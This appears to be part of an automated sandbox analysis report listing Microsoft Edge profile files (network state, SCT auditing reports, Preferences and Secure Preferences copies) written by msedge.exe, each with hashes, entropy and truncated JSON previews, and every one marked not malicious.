                                                                                                                                                                                                                                                                                                                                                        MD5:11C15C6D953C0CEDBC92C4858AD07B72
                                                                                                                                                                                                                                                                                                                                                        SHA1:C5ABC83D3B6788DC4227E9BCCFADFBA196B96227
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD4C6D1949B6FB1E91AE5118848BE96AA769368E153FF96BB9366CAF2B289BC4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3F0EA2C4E854B6C4AE0AB1FA500419D4921FD9B10A5BC932A024F166CF0B0E541930CA80DF2FB329EC2EACF98B32526D321E34FC687B455CEE1A28D0DE31AD9C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659974696719","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659976516876","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF44785.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF45456.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f15fd196-538d-41d8-bd11-6e04e956a32b.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f7fcdbcd-ae14-4316-aa6e-3e05d50c6d76.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1546
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.344921734504277
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcFGJ/I3RdsTcZVMdmRdsTAyZFRudFGRw6C1E6ma3yeesw6maPsRds7ZC52Hu8bd:YcgCzs4tsJfc7aleeBkEs1CgHu8bxo+
                                                                                                                                                                                                                                                                                                                                                        MD5:11C15C6D953C0CEDBC92C4858AD07B72
                                                                                                                                                                                                                                                                                                                                                        SHA1:C5ABC83D3B6788DC4227E9BCCFADFBA196B96227
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD4C6D1949B6FB1E91AE5118848BE96AA769368E153FF96BB9366CAF2B289BC4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3F0EA2C4E854B6C4AE0AB1FA500419D4921FD9B10A5BC932A024F166CF0B0E541930CA80DF2FB329EC2EACF98B32526D321E34FC687B455CEE1A28D0DE31AD9C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659974696719","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378659976516876","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fea9c77b-39ae-491a-9767-e6940f5beb02.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF48c10.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4c03f.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4e8b6.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF54a8d.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):38626
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5549808317669775
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:7rKOLL7pLGLpmIWPA+fkd8F1+UoAYDCx9Tuqh0VfUC9xbog/OV+EjeHrw2ifY+qr:7rKOLdcpmIWPA+fkdu1jaP0eU2ifY7sK
                                                                                                                                                                                                                                                                                                                                                        MD5:633743C66C287FA1C8AE26CAC4D3D24B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5E6F07062D677B1A795A714933BA3C3B1E0999C4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F11EDBCEB491F1978DF0BE0C310C68F26FBB1A6D972BAF11E9DA488D8E15FF58
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F26BF95F621A2DE8A1D155D056789D8E20DF5B7F4905C041A9747B7D3D5263DEB6574747AE352364476DD7D9CF8FD61467C237408151A25B85FA6CA3B877FD8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376067971858364","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376067971858364","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4a68d.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):38626
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5549808317669775
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:7rKOLL7pLGLpmIWPA+fkd8F1+UoAYDCx9Tuqh0VfUC9xbog/OV+EjeHrw2ifY+qr:7rKOLdcpmIWPA+fkdu1jaP0eU2ifY7sK
                                                                                                                                                                                                                                                                                                                                                        MD5:633743C66C287FA1C8AE26CAC4D3D24B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5E6F07062D677B1A795A714933BA3C3B1E0999C4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F11EDBCEB491F1978DF0BE0C310C68F26FBB1A6D972BAF11E9DA488D8E15FF58
